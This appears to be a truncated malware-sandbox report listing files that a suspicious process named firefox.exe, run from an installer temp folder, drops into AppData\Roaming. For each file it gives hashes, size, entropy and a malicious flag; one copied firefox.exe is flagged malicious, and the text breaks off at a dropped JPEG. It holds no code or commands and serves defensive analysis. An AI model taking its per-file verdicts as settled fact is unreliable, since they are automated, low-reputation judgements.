SHA1:F88E1EA0BA66D1615D7E1D53C95D8E8DBE6BEBE0
SHA-256:891CCFEB349116283326262C27B8894B43CDC89B8AFD5BA7D21B891814A68075
SHA-512:3025CCF26BAB11AEC6476C8091968EA040BB37BD9244F6F9DD4AF0FB79D543266420876A64A9FDCDEEA0BB10932E416EF6909D6ECBAF6577D7AE86F17A71E4B9
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):21696
Entropy (8bit):7.0116845824999805
Encrypted:false
MD5:6B937FE1EFF0E440B124BBB9334DF34D
SHA1:AB3982AB9D46BAA67B1D59728BC6E93C45872B2B
SHA-256:71C87C14BC1BD0B20D9F68D4943E93C4C6DDC1B6CF252938BB15FE562552F93E
SHA-512:13D58EACBAC1D97F780BDF87A29CEEA047F6AC1002C6D79FC661FE7AA759C654BA14842D840887B41C48A15E06ED8358FC1A7E124DD6123D2145F1254364B82F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.106107140155806
Encrypted:false
MD5:EA4AE42721460002DC31515F295AD1C4
SHA1:8A970D589AA4C178083EE8FB65798A6DDECDC1CF
SHA-256:668F91E94E76DB4457184909E6A1AB4655E81A8EF37DC37B4ECFE93146C29A88
SHA-512:5EA1F2FB8BE9FFDF80250B47A440DDB3A41E46A8CE73B6F4834E59CB8D30A1B474F6A33D716EFA43AC7EE52D37AC941F3D51021792B9D1439C831B8A368781B9
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.1620766534253555
Encrypted:false
MD5:AD895B2A99A3EC18F1690BBAC1E2037A
SHA1:19FAB11CA8D2AB4A3C1A863209CBDC77A69E1AED
SHA-256:A11C772B2451B0C9C706B03381819E4A1DEF3E2FBBBA8362509BBE57DBD5C666
SHA-512:D021A5B8451BB8BAC27B4F496A1A25E0A2B2F90C93A7E27850303C5FEB9441F9B926B13EF024C176827E190F2DC04F401205983510DFAB0946674D18994BBE8F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.1097867214760235
Encrypted:false
MD5:0A0084D4B3635E4D8EBAB587DCFCC16C
SHA1:5619483328D58AD6B4D2A8A860DABED1BBDB8091
SHA-256:5089484C8C56AC8E095CADC3DC971DF71EDEB52F856940632821FD37E81AE5CA
SHA-512:D50989131E3B66335F9972E46D056FF1CE585AC90877C388B35BC66E285D24CC4FBC6688F62543CAF3DF86D3E3D1087BDC2822C9F69B0978E35BB727FE47B58B
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.177990634000795
Encrypted:false
MD5:0AEAF9CE58CBD0AF1E30D03B45C21F81
SHA1:1EC04DCA23EB4D28861A16D5CCA0D4FEB91E2E32
SHA-256:9A5952C82CBCB1A8ECE9C51C258667D9AB96D13EC6455873999FF0BF78C3CAB0
SHA-512:49F9D30694F6C272E6CB84F71B3801DFF5256D25AC9479ACC6577038783E8B62E36BD0A5A8D07E618830E64749F92DEE0454DD88E132B333D558319FB282EF7A
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18104
Entropy (8bit):7.190985597083441
Encrypted:false
MD5:13BBF7740AFC464172B00F9638BC4F81
SHA1:A92D84A10B161342FCF0E51AD1C287F9B8890525
SHA-256:FF482F69F2183B5FD3C1B45D9006156524B8F8A5F518E33D6E92EA079787E64D
SHA-512:F572E67384EF07790AAAEC8C8E5CAB6C4E9ED954CAF95033CB31121185780A9CD74A5AB123F744F1AE7F889D8DFC9F8AA3BE70999224FD6A1A37FF27BD8AB0D0
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.128506970533883
Encrypted:false
MD5:8F239C629F09E1B49CF1F03304AB8E69
SHA1:D54DBE7E79A8389B3BAE3273487BC22D4B99781A
SHA-256:D8D74FB87F94A587582D56934816362B992B712E47C39F13D957058F17724886
SHA-512:130D1BB38C757BBCE7B3C558624028C771FA1198B8D02F0BE1F210A688E5779F8FCBB44154678E898D6FBA4EC31D03664CC84D063816E977361D4ECABAD7911E
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20672
Entropy (8bit):7.088938940487771
Encrypted:false
MD5:41A0D67BA3833D230F1229FF058BE057
SHA1:A66FDA76D97D059067F11C3E03869A1B9DA439A0
SHA-256:4F11443A2FA6C714D3E33597F0D08DE4E11A6A2FDB7DE2E4A01ADDD5977665C5
SHA-512:A4138CC25AC899059A702F4E078E7662F15B7059089E53B6EB1A78A1BBEBC03704421BDD0A5FCBDFFD48BE2842D587E4E3E56D881F0462F60CDDC5C75FC14F2F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.096735184430082
Encrypted:false
MD5:536F07C04C316AAC61AB64A492ED9191
SHA1:0A2F45D0BA54C4FB5DECBB111BBCC9088FC3269E
SHA-256:50BF87DA10AE3F442C457E42D6666993B0FCA7C5D4DF521E8CD0959995FBCDDC
SHA-512:B0EC28B75761494A6121C56811DABC297B8E1EA1D56EE4B06A4488D36C16BD26015F2CE945BF9F74B455864828D321AF5DD8B66F839A047458A98984B9343819
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.167129892042716
Encrypted:false
MD5:87B1814412CDAC3D08FAD8DD3A79EBAD
SHA1:CA1946721D023BE9825A5AFAC4364248A56111E1
SHA-256:2F4690B3C2587C0BFB81AB701D50E497406994613151FAF007423C59CA5E2281
SHA-512:999D6EEB454760A422FAB3B1F1D3DE6B99789838FDFE88F78A3AF52842672F67BB4CA05AE157BF68CEE6D96A1F4B0924555DA67A4FFAD9DB9044E411E071D206
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.06770071137197
Encrypted:false
MD5:87E0EF2D5DF6F6E18E6EA9171E3D77E7
SHA1:EB6A1D8D169A683BD1357877AC94BFC98799FEEB
SHA-256:9B5A5536AED84D45A00DA1056AF4762FEC805EABA742C6BF2D2FCA60993711BB
SHA-512:AB0CB69F13793604E7D3BB97D6CEE38CCA0CDB4889C10F228119713902211C0AEB8A493307FAAC614D05A669BD2E172D83C0AED494751D50DE1874D4AA90D379
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20160
Entropy (8bit):7.084664816938566
Encrypted:false
MD5:066874FF22E1C100DC56C4AE76D2E1C2
SHA1:896031A6BB845525A6AAB4B56A4DB2805E797A65
SHA-256:979FF0E25E7EA00B8714C9EF2DC8417E69AFAC137EA88F77F8F5A9FFEAA31923
SHA-512:0DCF7F1956C980CDBBA6279C7E4D80F30D85AA37D3507166E0B67F008FCFABD00CB8E27532A362218EF3EBF66D92CA3D97A23D1028B83DFFE36AA6E953F3D83E
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.107805652186164
Encrypted:false
MD5:F43A8E9CD787B6D91BB29DBB8EB1A4E5
SHA1:336B61853627E6E64A10FBB930577D30334E615E
SHA-256:5BACBBE62E36AD0F6D7742E70361F26BC56A44DBD28CC0291F588420E0C218A6
SHA-512:1FDC1170907346EF0ECED900DE9091136A6626C4BFC8B4416DFEBBE356F35F9C2BE0D2CF6C37E3DD231F3DB8B5A3AFE8973F15A45544C0C1C10682FE03911616
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.186846642215803
Encrypted:false
MD5:A616102234EC5AB394FF1C77DA34F6C0
SHA1:51E54AAFF7F4902B40E657F31775E50000F8240A
SHA-256:619E5120BFDD11461672CE8798DA00166E57C528B9AFD80404D2C9CBE87E2C07
SHA-512:C360C045D7CCC3D61FFDF35C3253D7F9C59A759A2EE1583519405D2751C12BACC7B26FA383EB53A0156797905F16F26E28293944A0CA31955E03CC07412F822C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.194045699834861
Encrypted:false
MD5:0AE94670FBD69ED5F8C923B75CE2C0BD
SHA1:ED53B6E73B867E23881244926B0DEA1524515672
SHA-256:6D541B215CFA452E54DC6AF9317A7FC24043FA465EF2B561E0F245A4870B2705
SHA-512:64886E61537830F013A576E40F83D5BC057EFBAB1F3839D5F30A98CBEAAE62F916EF2AFBA6EC9F7CEFDA89907DDA9F704105CAE59CB880F8148F34F3F011562B
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.133848449054411
Encrypted:false
MD5:4C745DC13735B4822FF160CB18B61E22
SHA1:CDC23598548A2F1CBF9AC2BA1003B6D6AF0471D0
SHA-256:550D4FC902F25F2A0C09F475B5CECEE43FB3A0A042126479560B0001DB5C4891
SHA-512:C4AC87FCD7F2130651C69D939929C013E663EB14502452808AB887A735F3DE34EF28E9C98491C3D427B936D3E53C2840F3195ED6EE62D10730DA29267D78149B
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20160
Entropy (8bit):7.045772919081531
Encrypted:false
MD5:A0DFBD2A68A979D1152E2B9153BB497B
SHA1:9BE79E52750719AD7B014F803CCF1C8D04C932DE
SHA-256:BFF7EA28E198C7DBEE45D35FD98AE03696E9E252D46BEC9FF7B7823CBA1681F1
SHA-512:238239FFC9034618DEC8161E15CBDD3B727F1615EF057193C95CED158DD42D876398CFC4854CB790B9DF0EA999F53A980D475ED4827335880D2A47CEA10BD7B5
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.135353533119842
Encrypted:false
MD5:2674310F6FC087862B215B26A5D6DA5B
SHA1:6E226A29124716FB6C5C54CBBF3C2B6F727C9E5A
SHA-256:E29EAA099BE15958CB65D03D47959CAE2DAC342402856C5F0E4DA672193C329D
SHA-512:86964E2A71A32D7FD0C6F3061ECBE66DD10D4938E0F5E3572F962B53107524259F62001BDFF7E4C9173A6B8270F46B76C1037DC69B8343F10E4B4E59BD8D6782
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.06799010155914
Encrypted:false
MD5:1A16AB59D63A2D6A37D3ABD032958631
SHA1:FC76579F19ABB0F24E1AFEA30E1C85FFED6CBC0F
SHA-256:81926C2B97A7B01061C5042DA0005F0B64FE9E07852478B2A65E8A8EB5560B1F
SHA-512:F3808B1566193AA9024B30477A530CD616174E8B310D455A368F89B2BC6C90D998F4CC611030F7801CBBEB3598DDF78968D628C56C44ED1631A3262159AFD4D7
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.169892235758202
Encrypted:false
MD5:FD14FCD1550F17701FBF239645B606FA
SHA1:0D7B1DE80DB94DABAD3CE91D31FDA1A8A1A6CFAB
SHA-256:A5453CD2B5E98D40CA17DD20A8F5974F29DE7236A076867A3BC3CBCA441BE928
SHA-512:162559D9E6E36BFFE32BE41F75075E711E6947ADAB2AD3BB37CF03E02E787AD5A6F3FB93AF4B6C3F82E1107DC401D32DBD53FCBA39F85839910E852C1109DB5B
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.094588451141472
Encrypted:false
MD5:1B5A116DAF8D01FDD0488666803DB17F
SHA1:DA47F3A722A75AE04662B5A6C486DEC6AE7379EA
SHA-256:48D491B08D395A8AC47CC22A70D1C3F5E84D716AFE2678E825F24492E8FF2ED4
SHA-512:4E4FDF0AEF5DD17F314A4B93AE521FD3E9E6B5C06EE17688DDEB280BA5C42FC72C75DB745B83ECEB740E5A747C0ABE07627457D6CCB0692DC5E65C96BDE96509
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.07970746470874
Encrypted:false
MD5:93FD7C2F4A8007521E2D1A73B6C21E6F
SHA1:FA2F6A112876613C8DB0276644F229F0C13EDAD1
SHA-256:3737D7875668EB4812AB01FE82226D758D480128C76BC234806BFD40694CF048
SHA-512:2390C17625E3377980E0B267E14EF572CF0E88F30A392C7E64A941F2FA98ED9D054B06ADC583FB44CD777D610F7F3CC4D5D26982D297D7DF938263F92AD5A876
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):22208
Entropy (8bit):6.921271327164854
Encrypted:false
MD5:BC0BE695E63548171105C57D2E9B98E7
SHA1:0C4506B330487C4B45900B06DFE0A3249F6B9D88
SHA-256:D16C5B0E19870E86354B5E6CDC4C81E80777749F6BBE6B675F680CEC0FFAE35D
SHA-512:095EF210F55233A0C0EB80FC2D94646DE96CB2E66D1994D631FA82E5A71A5C26B32D33ABC19AC69E64BD3E4789EB1A7595818A90494038EA1771C210CD81CB2A
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.081538661952178
Encrypted:false
MD5:6BFBF95B7253F32A77BACDF119B678F3
SHA1:3E3522A9D62940E1E3C0ED6F785AF0B5E3A33600
SHA-256:9FC2486ED5D3FFF78DEB69A7386F4575451D43B67F759AFB056AC66B82041E3D
SHA-512:603A5A199A19028B2E496051772517C488FD3FCC05DD6BEC51E15C58DAD2981F7DAB44C3D7E1BE836AFE8F3CF35AC90E574F0062737C353079E33096DBA26F10
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20160
Entropy (8bit):7.084485679603242
Encrypted:false
MD5:07BA5F40C64134E5749DF0E8CFEE082E
SHA1:5B872A7EA316B6B3BA604B88045B9B6F34BA4C8B
SHA-256:136E5DE4B535AABF6368C06F82339D2EF6C34165661F40433BCEF4EBB90B30FE
SHA-512:55B5C739D08F5627D9453709CC0D3D20C3FC08E9A1168F70381B49F8FDC8D91F15DB85DB51D47AAAE612CBE920BB3BA83075E74888B2D62E3A962F181B3D2C12
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.163311181625049
Encrypted:false
MD5:CB4E401CE4FC657CCEBB85F96840CC8B
SHA1:359910F84B5FAF0D194D534C2F631DB5074EA28D
SHA-256:B90BFFA9E03FFD4ECF1D0D709C60F61D13490E84C4550EF06586BC9B1024ED00
SHA-512:382DF8909DC347DD86696756CD22650EE9BE45146FFDF3B400DA4E370C7C42BCDD4C7FDB807E5A9161211B975B9750EE6CB2B2E2132AAD9D3F90DB9956C2275E
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.132065899718217
Encrypted:false
MD5:B53D96644F5774FE29BA8BB12D6E5F66
SHA1:260CBBADA90E29EE8E308996E973CE635496D53C
SHA-256:BE19250A19ED49CE247999D6F0B953EDC2AB7C66B46F1CFBD0C24BE91B84B297
SHA-512:E894CAE26EA86325A9012EC2A00086E136AFE64F38F8DA8B3C5EE1CCAD87B1DCF502AD41E050C1ECFBC1C45D2C69A3C35C5322765EF92DDAF00E5E9953F3436F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):28864
Entropy (8bit):6.66295566360206
Encrypted:false
MD5:49A69484B524C6F9FD641E015DD15154
SHA1:F6EC9E38D05ED66E8431B909ABA0451EF8C9B540
SHA-256:69C637C0BE7DDFE0690D8C642EC6D0850085617C3C3DDA9531CAC818F06F66E8
SHA-512:802D186F4B580541916C038999C0653765F2CB01C345549F6D927F7688B671B234C7EE05F2A9EBA6C139F25C459E579DA4437EE2AC03ED3FE3EBEF849F178553
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):25792
Entropy (8bit):6.781766293773302
Encrypted:false
MD5:66F65B59DFF2F8927DC3C8045D8C3A0A
SHA1:AE459D1B4D6615587D8B9133EC72162C717287FC
SHA-256:414A2BD84B042E2CCF758270647BCFA02D78EB0125C0584DD53F7245481D66B9
SHA-512:4FA559F7E3B423A736081A67C8A19084288A870307547B19B2DCCAD935AFDC56311A2045CEB4791D1CA33A05F7F1F906C21363A2076436431A118667F298D577
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):72896
Entropy (8bit):5.834415075746363
Encrypted:false
MD5:BF090F2290C18F96FD359A6596EA4233
SHA1:BA1FD71AEFFB0E9629CF0DDC5D5E4704627FB0E5
SHA-256:5710E3ED5819CCAA9CF558AB57534BC880C610C06F2A44ADFAFBFAB5BFC38C2B
SHA-512:01B3D02B6FB7B6ED7302903D8E2937372A5BA582755CCD73D4FAE2B904F278BD4F38C3C2B0CC12F7DA8AC4DBE204976CFB492D8AFE7497F39B800ADC652BAC64
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.067790575145041
Encrypted:false
MD5:E4D419A1897B507E01F75EF88457979F
SHA1:5C769D5E7FCECBF384D09F340E7DCEB951A2F9C6
SHA-256:3A2355A23874342777391B4A06C5CDCD990DED287CC4A27FDF0A071AC3B229AD
SHA-512:65EDB60FD6E897EE2AC74976C47A8B55B8C45BB707C8F1134D78517D0883A16634A3C6142F3A925BE0441D594EEBE90149675D38E4A8DF23D6A68F163F60E611
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):22720
Entropy (8bit):6.942253423928934
Encrypted:false
MD5:11218C9F81404A51D1EB6B56BA60F9AB
SHA1:ACC303D1B1A5822ED7BCF8F666860A0A7AAFFE91
SHA-256:882DA90B6368056908E9CD21C4719A016E9A3CA597ECA9183892A5806B4A8D4A
SHA-512:86928D70AEC7BD7170863C0CDEA110F8A4AA244EFB30577310AD1908D71817B8A2AEB45833D5F710B15DF8FE096234CFB069819B0F2B706CFCD15B5614615929
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):24256
Entropy (8bit):6.86072682024164
Encrypted:false
MD5:D67520BFF673CAB4B2ED1AF12DE37A1F
SHA1:752DEACC54982012852E68C37253E95B8BB89AEE
SHA-256:44BBB2AEC747E1CBC63FC7C4D2E8C5EC1CA9F9D026835AC2CCB0D60971B6107A
SHA-512:A960EC529E6889B0F3253869FC72C4F65615141D23F42D808DE99E192B89B15DBC24B1D37812DC89F68576662173F18BC047A46B92598567E8C7E37E51821AB0
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):24256
Entropy (8bit):6.8602671281732635
Encrypted:false
MD5:E65F76759251845FA1E6A3CF41B5F231
SHA1:DE4517EB0D8B330D3C2717E786F485150CAF82EC
SHA-256:034A8ABF2BF027AD950FDF8FBDF488188C8D02EBA8E160AA95DE376FF1F32FE6
SHA-512:AFC7D0A26B2FFEFB43846D621585FC35A2CE280EEF1D046DA5A327F20AE7B023CCEB2BFD64176787AB86A76567E233215427686243E62ECA5DED1AD14B19B5B5
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20672
Entropy (8bit):7.0106564368261175
Encrypted:false
MD5:1622347A34EBA068916713CF28F46B67
SHA1:18B3960E88118195F17C4BEF47DF1F7935CEE459
SHA-256:9766C4200B3F51630097FCE8D4F10B33383E663601802ADA72660604876C99E9
SHA-512:90B2398918487E0CCFE8F859AEE6E729A4063A110204644A75649331F10895B6C4DE09E57B6E20E8FAC04AC413F54A82889E602D05F5F42690B87D9C2253FA2E
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.127398472524706
Encrypted:false
MD5:F7AF6BB63229721005C8AC85DC86F5C2
SHA1:35DDD88FBEA433A7E934AB0CA64907F8B0A85D9A
SHA-256:FA10F7E2AB54C2EBCD4688E39BC4AF1544FA21B73BE7FD0562B3FF7CFF041F7A
SHA-512:E4F242EC6204DD481EA5B8B1EDBFB9A7C8B136D9869FB85868325B21248AA170FECDF43075361E188B20A6F138F3760226B4CFB302929E04CD3901E6CB03961A
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.list
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:ASCII text, with no line terminators
Size (bytes):11
Entropy (8bit):2.5503407095463886
Encrypted:false
MD5:E930CCBB2F833479DD58E27A9288E128
SHA1:D58BDF26572FD015652227C9DF78AA345F4A1F80
SHA-256:F039C6C3630501F9476043356BA47B050AFDE8D534438A7E3A7135D792484932
SHA-512:3E42C62699C0B5D2343E6FE872B11D3AD8D75104F946EC09AA48B129F3C090EDCEC9FFAEDF143AF478838E515E4D4C14FE45390C9E3ED24A1E9EB0FC3F965A06
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):531408
Entropy (8bit):6.731849192407803
Encrypted:false
MD5:52FFABA4273678BAE75442F2BC85B470
SHA1:66A4C6CF92A4190A1480FD2B19AC84952FA715BD
SHA-256:70225F14A28007815B0410B1F41F7EA6A16B6329FD69F7EC06386B05862CF5C4
SHA-512:4D6E222378CC99B7CA64EC6738B97504201364760E94BA0276F272860608952E5A260B70A28246D6857404209C7B2ECEFD0C22EBA59B3788069DA7A1B39266F2
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpg
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:JPEG image data, JFIF standard 1.02
Size (bytes):22117
Entropy (8bit):7.966262180259871
Encrypted:false
MD5:2EACE55C93918524BD2F8F06B4DDBEB3
SHA1:8EB9A69D877C96603C2F26E895BF1DC89CF1927E
SHA-256:667BE8442298610861B8561DA6E2F4005857D0AB076A3A8FF578D9B7E3DA729E
